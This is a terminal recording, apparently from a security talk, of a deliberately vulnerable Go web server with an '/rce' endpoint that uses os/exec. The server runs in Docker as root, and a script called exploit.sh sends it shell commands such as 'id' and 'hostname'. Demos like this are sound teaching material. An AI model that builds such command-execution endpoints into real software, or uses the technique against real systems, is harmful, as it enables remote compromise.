{"width": 90, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}, "timestamp": 1549730332, "version": 2, "idle_time_limit": 3.0, "height": 24}
[0.011105, "o", "\u001b[?1049h\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b]112\u0007\u001b[?25l\u001b[1;1H$\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[30m\u001b[42m[preso] 0:bash*Z                                        \"bmitch-asusr556l\" 11:38 09-Feb-19\u001b(B\u001b[m\u001b[24;1H\u001b[1;24r\u001b[H\u001b[2C\u001b[?12l\u001b[?25h"]
[0.011792, "o", "\u001b[H\u001b[K$\u001b[C"]
[0.630008, "o", "v"]
[0.751009, "o", "i"]
[0.835295, "o", "\u001b[C"]
[1.41393, "o", "m"]
[1.525244, "o", "a"]
[1.68227, "o", "i"]
[1.804239, "o", "n"]
[1.915233, "o", ".go\u001b[C"]
[2.480162, "o", "\r\n"]
[2.488765, "o", "\u001b[?25l\u001b[H\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2d\u001b[?12l\u001b[?25h\u001b[?1h\u001b="]
[2.48954, "o", "\u001b[1;23r\u001b[H\u001b[K\r\n\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\u001b[1B\u001b[K\"main.go\"\u001b[1;24r\u001b[H\u001b[23;10H\u001b[?25l\u001b[1;23r\u001b[H\u001b[23;11H29L,\u001b[C634C"]
[2.489608, "o", "\u001b[1;24r\u001b[H\u001b[23;20H"]
[2.490514, "o", "\u001b[Hpackage\u001b[Cmain\u001b[3;1Himport\u001b[C(\u001b[4;4H\"fmt\"\u001b[5;4H\"net/http\"\u001b[6;4H\"os/exec\"\r\n)\u001b[9;1Hfunc\u001b[Cmain()\u001b[C{\u001b[10;4Hhttp.HandleFunc(\"/\",\u001b[Croot)\u001b[11;4Hhttp.HandleFunc(\"/rce\",\u001b[Crce)\u001b[12;4Hfmt.Print(\"Ready\u001b[Cto\u001b[Creceive\u001b[Crequests\u001b[Con\u001b[Cport\u001b[C6666\\n\")\u001b[13;4Hhttp.ListenAndServe(\":6666\",\u001b[Cnil)\r\n}\u001b[16;1Hfunc\u001b[Croot(w\u001b[Chttp.ResponseWriter,\u001b[Cr\u001b[C*http.Request)\u001b[C{\u001b[17;4Hw.Header().Set(\"Server\",\u001b[C\"Very\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\")\u001b[18;4Hw.WriteHeader(200)\r\n}\u001b[21;1Hfunc\u001b[Crce(w\u001b[Chttp.ResponseWriter,\u001b[Cr\u001b[C*http.Request)\u001b[C{\u001b[22;4Hw.Header().Set(\"Server\",\u001b[C\"Very\u001b[CBad,\u001b[CNo\u001b[CGood,\u001b[CGo\u001b[CServer\")\u001b[1;23r\u001b[H\u001b[23;73H1,1\u001b[11CTop\u001b[1;24r\u001b[H\u001b[?12l\u001b[?25h"]
[3.282561, "o", "\u001b[?25l\u001b[24d\u001b[30m\u001b[42m[preso] 0:vi*Z                                          \"bmitch-asusr556l\" 11:38 09-Feb-19\u001b(B\u001b[m\u001b[1;1H\u001b[?12l\u001b[?25h"]
[3.283495, "o", "\u001b[1;23r\u001b[23;73H2\u001b[C0-1\u001b[1;24r\u001b[H\r\n"]
[3.781808, "o", "\u001b[1;23r\u001b[H\u001b[23;73H3\u001b[C1  \u001b[1;24r\u001b[H\u001b[2B"]
[3.812201, "o", "\u001b[1;23r\u001b[H\u001b[23;73H4\u001b[2C-3\u001b[1;24r\u001b[H\u001b[4;3H"]
[3.842355, "o", "\u001b[1;23r\u001b[H\u001b[23;73H5\u001b[1;24r\u001b[H\u001b[5;3H"]
[3.872747, "o", "\u001b[1;23r\u001b[H\u001b[23;73H6\u001b[1;24r\u001b[H\u001b[6;3H"]
[3.903188, "o", "\u001b[3;8H\u001b[46m(\u001b[7;1H)\u001b[1;23r\u001b[H\u001b[23;73H\u001b[49m7\u001b[2C  \u001b[1;24r\u001b[H\u001b[6B"]
[3.933272, "o", "\u001b[3;8H(\u001b[7;1H)\u001b[1;23r\u001b[H\u001b[23;73H8\u001b[C0-1\u001b[1;24r\u001b[H\u001b[7B"]
[3.96381, "o", "\u001b[1;23r\u001b[H\u001b[23;73H9\u001b[C1  \u001b[1;24r\u001b[H\u001b[8B"]
[3.994146, "o", "\u001b[1;23r\u001b[H\u001b[23;73H10,1-3\u001b[1;24r\u001b[H\u001b[10;3H"]
[4.024457, "o", "\u001b[1;23r\u001b[H\u001b[23;74H1\u001b[1;24r\u001b[H\u001b[11;3H"]
[4.515378, "o", "\u001b[1;23r\u001b[H\u001b[23;74H2\u001b[1;24r\u001b[H\u001b[12;3H"]
[4.965891, "o", "\u001b[1;23r\u001b[H\u001b[23;74H3\u001b[1;24r\u001b[H\u001b[13;3H"]
[5.385967, "o", "\r\u001b[7m  \u001b[Chttp.ListenAndServe(\":6666\", nil) \u001b[?25l\u001b(B\u001b[m"]
[5.387178, "o", "\u001b[23;18H\u001b[K\u001b[1;23r\u001b[H\u001b[23d\u001b[1m-- VISUAL LINE --\u001b[55C\u001b(B\u001b[m13,1-3\u001b[8CTop\u001b[1;24r\u001b[H\u001b[13;3H\u001b[?12l\u001b[?25h"]
[8.450024, "o", "\u001b[34C\u001b[K\u001b[23;1H\u001b[K\u001b[72C\u001b[K\u001b[13;1H  \u001b[Chttp.ListenAndServe(\":6666\", nil)\u001b[1;23r\u001b[H\u001b[23d:\u001b[1;24r\u001b[H\u001b[23;2H"]
[8.786853, "o", "\u001b[1;23r\u001b[H\u001b[23;2Hq\u001b[1;24r\u001b[H\u001b[23;3H"]
[9.241236, "o", "\r\u001b[K\u001b[?25l\u001b[H$ vi main.go\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[2d\u001b[?12l\u001b[?25h\u001b[?1l\u001b>"]
[9.241564, "o", "$\u001b[C"]
[10.418776, "o", "\u001b[?25l\u001b[24;1H\u001b[30m\u001b[42m[preso] 0:bash*Z                                        \"bmitch-asusr556l\" 11:39 09-Feb-19\u001b(B\u001b[m\u001b[2;3H\u001b[?12l\u001b[?25h"]
[10.967865, "o", "."]
[11.03108, "o", "/"]
[11.400094, "o", "d"]
[11.54528, "o", "o"]
[11.65676, "o", "cker-"]
[11.657345, "o", "\u0007"]
[12.110045, "o", "b"]
[12.330469, "o", "uild.sh\u001b[C"]
[12.802759, "o", "\r\n"]
[12.887123, "o", "Sending\u001b[Cbuild\u001b[Ccontext\u001b[Cto\u001b[CDocker\u001b[Cdaemon\u001b[2C179.2kB\r\n"]
[13.046691, "o", "Step\u001b[C1/4\u001b[C:\u001b[CFROM\u001b[Cgolang:latest\u001b[?25l\u001b[24;1H\u001b[30m\u001b[42m[preso] 0:sh*Z                                          \"bmitch-asusr556l\" 11:39 09-Feb-19\u001b(B\u001b[m\u001b[5;1H\u001b[?12l\u001b[?25h\u001b[C--->\u001b[C5049ec6e3141\r\nStep\u001b[C2/4\u001b[C:\u001b[CWORKDIR\u001b[C/app\r\n"]
[13.047161, "o", "\u001b[C--->\u001b[CUsing\u001b[Ccache\u001b[8;2H--->\u001b[C6719c2dd0829\r\nStep\u001b[C3/4\u001b[C:\u001b[CCOPY\u001b[C.\u001b[C/app/\r\n"]
[13.683756, "o", "\u001b[C--->\u001b[C7c964d8a2d47\r\nStep\u001b[C4/4\u001b[C:\u001b[CCMD\u001b[Cgo\u001b[Crun\u001b[Cmain.go\r\n"]
[13.972735, "o", "\u001b[C--->\u001b[CRunning\u001b[Cin\u001b[C44dd5bad7a7a\r\n"]
[14.630117, "o", "Removing\u001b[Cintermediate\u001b[Ccontainer\u001b[C44dd5bad7a7a\u001b[14;2H--->\u001b[C90b30419e6e8\r\n"]
[14.635554, "o", "Successfully\u001b[Cbuilt\u001b[C90b30419e6e8\r\n"]
[14.748825, "o", "Successfully\u001b[Ctagged\u001b[Cgolang-demo:latest\r\n"]
[14.752424, "o", "$\u001b[C"]
[15.990278, "o", "\u001b[?25l\u001b[24;1H\u001b[30m\u001b[42m[preso] 0:bash*Z                                        \"bmitch-asusr556l\" 11:39 09-Feb-19\u001b(B\u001b[m\u001b[17;3H\u001b[?12l\u001b[?25h"]
[15.990584, "o", "."]
[16.062646, "o", "/"]
[16.376979, "o", "d"]
[16.510083, "o", "o"]
[16.695169, "o", "cker-"]
[16.69573, "o", "\u0007"]
[17.220237, "o", "r"]
[17.377049, "o", "u"]
[17.505666, "o", "n.sh\u001b[C"]
[18.339571, "o", "\r\n"]
[18.55537, "o", "\u001b[?25l\u001b[24d\u001b[30m\u001b[42m[preso] 0:sh*Z                                          \"bmitch-asusr556l\" 11:39 09-Feb-19\u001b(B\u001b[m\u001b[18;1H\u001b[?12l\u001b[?25h"]
[20.751246, "o", "\u001b[?25l\u001b[32m\u001b[6A──────────────────────────────────────────────\u001b[39m────────────────────────────────────────────\u001b[1;1H\u001b(B\u001b[m ---> 6719c2dd0829\u001b[K\r\nStep 3/4 : COPY . /app/\u001b[K\r\n ---> 7c964d8a2d47\u001b[K\r\nStep 4/4 : CMD go run main.go\u001b[K\r\n ---> Running in 44dd5bad7a7a\u001b[K\r\nRemoving intermediate container 44dd5bad7a7a\u001b[K\r\n ---> 90b30419e6e8\u001b[K\r\nSuccessfully built 90b30419e6e8\u001b[K\r\nSuccessfully tagged golang-demo:latest\u001b[K\r\n$ ./docker-run.sh\u001b[K\r\n\u001b[K\u001b[2B$\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[30m\u001b[42m[preso] 0:sh*                                           \"bmitch-asusr556l\" 11:39 09-Feb-19\u001b(B\u001b[m\u001b[11;1H\u001b[?12l\u001b[?25h"]
[21.666731, "o", "\u001b[?25l\r\n──────────────────────────────────────────────\u001b[32m────────────────────────────────────────────\u001b(B\u001b[m\u001b[13;3H\u001b[?12l\u001b[?25h"]
[21.667577, "o", "\u001b[?25l\u001b[24;1H\u001b[30m\u001b[42m[preso] 0:bash*                                         \"bmitch-asusr556l\" 11:39 09-Feb-19\u001b(B\u001b[m\u001b[13;3H\u001b[?12l\u001b[?25h"]
[22.663719, "o", "."]
[22.765123, "o", "/"]
[22.993406, "o", "e"]
[23.187174, "o", "x"]
[23.335682, "o", "p"]
[23.516994, "o", "l"]
[23.701953, "o", "o"]
[23.885871, "o", "i"]
[24.029676, "o", "t"]
[24.232698, "o", "."]
[24.359277, "o", "s"]
[24.50481, "o", "h"]
[24.632133, "o", "\u001b[C"]
[25.545615, "o", "l"]
[25.683199, "o", "s"]
[25.829249, "o", "\u001b[C"]
[26.080685, "o", "-"]
[26.336046, "o", "l"]
[27.518298, "o", "\u001b[1;11r\u001b[H\u001b[11dReady\u001b[Cto\u001b[Creceive\u001b[Crequests\u001b[Con\u001b[Cport\u001b[C6666\r\n\u001b[?25l\u001b[HStep 3/4 : COPY . /app/\u001b[K\r\n ---> 7c964d8a2d47\u001b[K\r\nStep 4/4 : CMD go run main.go\u001b[K\r\n ---> Running in 44dd5bad7a7a\u001b[K\r\nRemoving intermediate container 44dd5bad7a7a\u001b[K\r\n ---> 90b30419e6e8\u001b[K\r\nSuccessfully built 90b30419e6e8\u001b[K\r\nSuccessfully tagged golang-demo:latest\u001b[K\r\n$ ./docker-run.sh\u001b[K\r\nReady to receive requests on port 6666\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[13;21H\u001b[?12l\u001b[?25h"]
[28.39925, "o", "\r\n"]
[28.400672, "o", "trying\u001b[Cto\u001b[Crun:\u001b[Cls\u001b[C-l\r\n"]
[28.504365, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Cls\u001b[C-l\r\n\u001b[?25l\u001b[H ---> 7c964d8a2d47\u001b[K\r\nStep 4/4 : CMD go run main.go\u001b[K\r\n ---> Running in 44dd5bad7a7a\u001b[K\r\nRemoving intermediate container 44dd5bad7a7a\u001b[K\r\n ---> 90b30419e6e8\u001b[K\r\nSuccessfully built 90b30419e6e8\u001b[K\r\nSuccessfully tagged golang-demo:latest\u001b[K\r\n$ ./docker-run.sh\u001b[K\r\nReady to receive requests on port 6666\u001b[K\r\nRunning: ls -l\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[15d\u001b[?12l\u001b[?25h"]
[28.63633, "o", "total\u001b[C28\r\n-rw-r--r--\u001b[C1\u001b[Croot\u001b[Croot\u001b[2C64\u001b[CFeb\u001b[2C9\u001b[C16:21\u001b[CDockerfile\r\n-rw-r--r--\u001b[C1\u001b[Croot\u001b[Croot\u001b[C230\u001b[CJan\u001b[C26\u001b[C15:33\u001b[CREADME.md\r\n-rwxr-xr-x\u001b[C1\u001b[Croot\u001b[Croot\u001b[2C80\u001b[CFeb\u001b[2C9\u001b[C16:21\u001b[Cdocker-build.sh\r\n-rwxr-xr-x\u001b[C1\u001b[Croot\u001b[Croot\u001b[2C80\u001b[CFeb\u001b[2C9\u001b[C16:21\u001b[Cdocker-run.sh\r\n-rwxr-xr-x\u001b[C1\u001b[Croot\u001b[Croot\u001b[2C98\u001b[CFeb\u001b[2C9\u001b[C16:34\u001b[Cexploit.sh\r\n-rw-r--r--\u001b[C1\u001b[Croot\u001b[Croot\u001b[2C42\u001b[CJan\u001b[C26\u001b[C14:07\u001b[Cgo.mod\r\n-rw-r--r--\u001b[C1\u001b[Croot\u001b[Croot\u001b[C634\u001b[CFeb\u001b[2C9\u001b[C16:34\u001b[Cmain.go\r\n"]
[28.637597, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[31.4073, "o", "\u001b[13;23r\u001b[H\u001b[23;3H./exploit.sh\u001b[Cls\u001b[C-l\u001b[1;24r\u001b[H\u001b[23;21H"]
[31.773391, "o", "\b\u001b[K"]
[31.919243, "o", "\b\u001b[K"]
[32.087608, "o", "\b\u001b[K"]
[32.244415, "o", "\b\u001b[K"]
[32.389609, "o", "\b\u001b[K"]
[32.718665, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hi\u001b[1;24r\u001b[H\u001b[23;17H"]
[32.882736, "o", "\u001b[13;23r\u001b[H\u001b[23;17Hd\u001b[1;24r\u001b[H\u001b[23;18H"]
[33.085581, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13dtrying to run: ls -l\u001b[K\r\ntotal 28\u001b[K\r\n-rw-r--r-- 1 root root  64 Feb  9 16:21 Dockerfile\u001b[K\r\n-rw-r--r-- 1 root root 230 Jan 26 15:33 README.md\u001b[K\r\n-rwxr-xr-x 1 root root  80 Feb  9 16:21 docker-build.sh\u001b[K\r\n-rwxr-xr-x 1 root root  80 Feb  9 16:21 docker-run.sh\u001b[K\r\n-rwxr-xr-x 1 root root  98 Feb  9 16:34 exploit.sh\u001b[K\r\n-rw-r--r-- 1 root root  42 Jan 26 14:07 go.mod\u001b[K\r\n-rw-r--r-- 1 root root 634 Feb  9 16:34 main.go\u001b[K\r\n$ ./exploit.sh id\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[33.08693, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cid\r\n\u001b[?25l\u001b[13dtotal 28\u001b[K\r\n-rw-r--r-- 1 root root  64 Feb  9 16:21 Dockerfile\u001b[K\r\n-rw-r--r-- 1 root root 230 Jan 26 15:33 README.md\u001b[K\r\n-rwxr-xr-x 1 root root  80 Feb  9 16:21 docker-build.sh\u001b[K\r\n-rwxr-xr-x 1 root root  80 Feb  9 16:21 docker-run.sh\u001b[K\r\n-rwxr-xr-x 1 root root  98 Feb  9 16:34 exploit.sh\u001b[K\r\n-rw-r--r-- 1 root root  42 Jan 26 14:07 go.mod\u001b[K\r\n-rw-r--r-- 1 root root 634 Feb  9 16:34 main.go\u001b[K\r\n$ ./exploit.sh id\u001b[K\r\ntrying to run: id\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[33.101213, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Cid\r\n\u001b[?25l\u001b[HStep 4/4 : CMD go run main.go\u001b[K\r\n ---> Running in 44dd5bad7a7a\u001b[K\r\nRemoving intermediate container 44dd5bad7a7a\u001b[K\r\n ---> 90b30419e6e8\u001b[K\r\nSuccessfully built 90b30419e6e8\u001b[K\r\nSuccessfully tagged golang-demo:latest\u001b[K\r\n$ ./docker-run.sh\u001b[K\r\nReady to receive requests on port 6666\u001b[K\r\nRunning: ls -l\u001b[K\r\nRunning: id\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[33.123657, "o", "\u001b[13;23r\u001b[H\u001b[23duid=0(root)\u001b[Cgid=0(root)\u001b[Cgroups=0(root)\r\n\u001b[?25l\u001b[13d-rw-r--r-- 1 root root  64 Feb  9 16:21 Dockerfile\u001b[K\r\n-rw-r--r-- 1 root root 230 Jan 26 15:33 README.md\u001b[K\r\n-rwxr-xr-x 1 root root  80 Feb  9 16:21 docker-build.sh\u001b[K\r\n-rwxr-xr-x 1 root root  80 Feb  9 16:21 docker-run.sh\u001b[K\r\n-rwxr-xr-x 1 root root  98 Feb  9 16:34 exploit.sh\u001b[K\r\n-rw-r--r-- 1 root root  42 Jan 26 14:07 go.mod\u001b[K\r\n-rw-r--r-- 1 root root 634 Feb  9 16:34 main.go\u001b[K\r\n$ ./exploit.sh id\u001b[K\r\ntrying to run: id\u001b[K\r\nuid=0(root) gid=0(root) groups=0(root)\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[33.124761, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[34.752081, "o", "\u001b[13;23r\u001b[H\u001b[23;3H.\u001b[1;24r\u001b[H\u001b[23;4H"]
[34.856577, "o", "\u001b[13;23r\u001b[H\u001b[23;4H/\u001b[1;24r\u001b[H\u001b[23;5H"]
[35.536256, "o", "\u001b[13;23r\u001b[H\u001b[23;5He\u001b[1;24r\u001b[H\u001b[23;6H"]
[35.759964, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hx\u001b[1;24r\u001b[H\u001b[23;7H"]
[36.058935, "o", "\u001b[13;23r\u001b[H\u001b[23;7Hploit.sh\u001b[1;24r\u001b[H\u001b[23;16H"]
[38.274437, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hh\u001b[1;24r\u001b[H\u001b[23;17H"]
[38.428536, "o", "\u001b[13;23r\u001b[H\u001b[23;17Ho\u001b[1;24r\u001b[H\u001b[23;18H"]
[38.563522, "o", "\u001b[13;23r\u001b[H\u001b[23;18Hs\u001b[1;24r\u001b[H\u001b[23;19H"]
[38.685249, "o", "\u001b[13;23r\u001b[H\u001b[23;19Ht\u001b[1;24r\u001b[H\u001b[23;20H"]
[38.816994, "o", "\u001b[13;23r\u001b[H\u001b[23;20Hn\u001b[1;24r\u001b[H\u001b[23;21H"]
[38.92887, "o", "\u001b[13;23r\u001b[H\u001b[23;21Ha\u001b[1;24r\u001b[H\u001b[23;22H"]
[38.992355, "o", "\u001b[13;23r\u001b[H\u001b[23;22Hm\u001b[1;24r\u001b[H\u001b[23;23H"]
[39.109128, "o", "\u001b[13;23r\u001b[H\u001b[23;23He\u001b[1;24r\u001b[H\u001b[23;24H"]
[39.418389, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13d-rw-r--r-- 1 root root 230 Jan 26 15:33 README.md\u001b[K\r\n-rwxr-xr-x 1 root root  80 Feb  9 16:21 docker-build.sh\u001b[K\r\n-rwxr-xr-x 1 root root  80 Feb  9 16:21 docker-run.sh\u001b[K\r\n-rwxr-xr-x 1 root root  98 Feb  9 16:34 exploit.sh\u001b[K\r\n-rw-r--r-- 1 root root  42 Jan 26 14:07 go.mod\u001b[K\r\n-rw-r--r-- 1 root root 634 Feb  9 16:34 main.go\u001b[K\r\n$ ./exploit.sh id\u001b[K\r\ntrying to run: id\u001b[K\r\nuid=0(root) gid=0(root) groups=0(root)\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[39.419974, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Chostname\r\n\u001b[?25l\u001b[13d-rwxr-xr-x 1 root root  80 Feb  9 16:21 docker-build.sh\u001b[K\r\n-rwxr-xr-x 1 root root  80 Feb  9 16:21 docker-run.sh\u001b[K\r\n-rwxr-xr-x 1 root root  98 Feb  9 16:34 exploit.sh\u001b[K\r\n-rw-r--r-- 1 root root  42 Jan 26 14:07 go.mod\u001b[K\r\n-rw-r--r-- 1 root root 634 Feb  9 16:34 main.go\u001b[K\r\n$ ./exploit.sh id\u001b[K\r\ntrying to run: id\u001b[K\r\nuid=0(root) gid=0(root) groups=0(root)\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[39.434416, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Chostname\r\n\u001b[?25l\u001b[H ---> Running in 44dd5bad7a7a\u001b[K\r\nRemoving intermediate container 44dd5bad7a7a\u001b[K\r\n ---> 90b30419e6e8\u001b[K\r\nSuccessfully built 90b30419e6e8\u001b[K\r\nSuccessfully tagged golang-demo:latest\u001b[K\r\n$ ./docker-run.sh\u001b[K\r\nReady to receive requests on port 6666\u001b[K\r\nRunning: ls -l\u001b[K\r\nRunning: id\u001b[K\r\nRunning: hostname\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[39.453189, "o", "\u001b[13;23r\u001b[H\u001b[23d98eb980768f7\r\n\u001b[?25l\u001b[13d-rwxr-xr-x 1 root root  80 Feb  9 16:21 docker-run.sh\u001b[K\r\n-rwxr-xr-x 1 root root  98 Feb  9 16:34 exploit.sh\u001b[K\r\n-rw-r--r-- 1 root root  42 Jan 26 14:07 go.mod\u001b[K\r\n-rw-r--r-- 1 root root 634 Feb  9 16:34 main.go\u001b[K\r\n$ ./exploit.sh id\u001b[K\r\ntrying to run: id\u001b[K\r\nuid=0(root) gid=0(root) groups=0(root)\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[39.455584, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[42.994671, "o", "\u001b[13;23r\u001b[H\u001b[23;3H.\u001b[1;24r\u001b[H\u001b[23;4H"]
[43.077917, "o", "\u001b[13;23r\u001b[H\u001b[23;4H/\u001b[1;24r\u001b[H\u001b[23;5H"]
[43.421718, "o", "\u001b[13;23r\u001b[H\u001b[23;5He\u001b[1;24r\u001b[H\u001b[23;6H"]
[43.601887, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hx\u001b[1;24r\u001b[H\u001b[23;7H"]
[43.860546, "o", "\u001b[13;23r\u001b[H\u001b[23;7Hploit.sh\u001b[1;24r\u001b[H\u001b[23;16H"]
[44.508189, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hh\u001b[1;24r\u001b[H\u001b[23;17H"]
[44.603416, "o", "\u001b[13;23r\u001b[H\u001b[23;17Ho\u001b[1;24r\u001b[H\u001b[23;18H"]
[44.661546, "o", "\u001b[13;23r\u001b[H\u001b[23;18Hs\u001b[1;24r\u001b[H\u001b[23;19H"]
[44.746209, "o", "\u001b[13;23r\u001b[H\u001b[23;19Ht\u001b[1;24r\u001b[H\u001b[23;20H"]
[44.841591, "o", "\u001b[13;23r\u001b[H\u001b[23;20Hn\u001b[1;24r\u001b[H\u001b[23;21H"]
[44.941939, "o", "\u001b[13;23r\u001b[H\u001b[23;21Ha\u001b[1;24r\u001b[H\u001b[23;22H"]
[45.048098, "o", "\u001b[13;23r\u001b[H\u001b[23;22Hm\u001b[1;24r\u001b[H\u001b[23;23H"]
[45.151651, "o", "\u001b[13;23r\u001b[H\u001b[23;23He\u001b[1;24r\u001b[H\u001b[23;24H"]
[45.598076, "o", "\u001b[C"]
[46.040585, "o", "\u001b[13;23r\u001b[H\u001b[23;25Hm\u001b[1;24r\u001b[H\u001b[23;26H"]
[46.119822, "o", "\u001b[13;23r\u001b[H\u001b[23;26Ha\u001b[1;24r\u001b[H\u001b[23;27H"]
[46.295545, "o", "\u001b[13;23r\u001b[H\u001b[23;27Hl\u001b[1;24r\u001b[H\u001b[23;28H"]
[46.601244, "o", "\u001b[13;23r\u001b[H\u001b[23;28Hw\u001b[1;24r\u001b[H\u001b[23;29H"]
[46.696588, "o", "\u001b[13;23r\u001b[H\u001b[23;29Ha\u001b[1;24r\u001b[H\u001b[23;30H"]
[46.839477, "o", "\u001b[13;23r\u001b[H\u001b[23;30Hr\u001b[1;24r\u001b[H\u001b[23;31H"]
[46.887147, "o", "\u001b[13;23r\u001b[H\u001b[23;31He\u001b[1;24r\u001b[H\u001b[23;32H"]
[47.451511, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13d-rwxr-xr-x 1 root root  98 Feb  9 16:34 exploit.sh\u001b[K\r\n-rw-r--r-- 1 root root  42 Jan 26 14:07 go.mod\u001b[K\r\n-rw-r--r-- 1 root root 634 Feb  9 16:34 main.go\u001b[K\r\n$ ./exploit.sh id\u001b[K\r\ntrying to run: id\u001b[K\r\nuid=0(root) gid=0(root) groups=0(root)\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$ ./exploit.sh hostname malware\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[47.453105, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Chostname\u001b[Cmalware\r\n\u001b[?25l\u001b[13d-rw-r--r-- 1 root root  42 Jan 26 14:07 go.mod\u001b[K\r\n-rw-r--r-- 1 root root 634 Feb  9 16:34 main.go\u001b[K\r\n$ ./exploit.sh id\u001b[K\r\ntrying to run: id\u001b[K\r\nuid=0(root) gid=0(root) groups=0(root)\u001b[K\r\n$ ./exploit.sh hostname\u001b[K\r\ntrying to run: hostname\u001b[K\r\n98eb980768f7\u001b[K\r\n$ ./exploit.sh hostname malware\u001b[K\r\ntrying to run: hostname malware\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[47.466944, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Chostname\u001b[Cmalware\r\n\u001b[?25l\u001b[HRemoving intermediate container 44dd5bad7a7a\u001b[K\r\n ---> 90b30419e6e8\u001b[K\r\nSuccessfully built 90b30419e6e8\u001b[K\r\nSuccessfully tagged golang-demo:latest\u001b[K\r\n$ ./docker-run.sh\u001b[K\r\nReady to receive requests on port 6666\u001b[K\r\nRunning: ls -l\u001b[K\r\nRunning: id\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: hostname malware\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
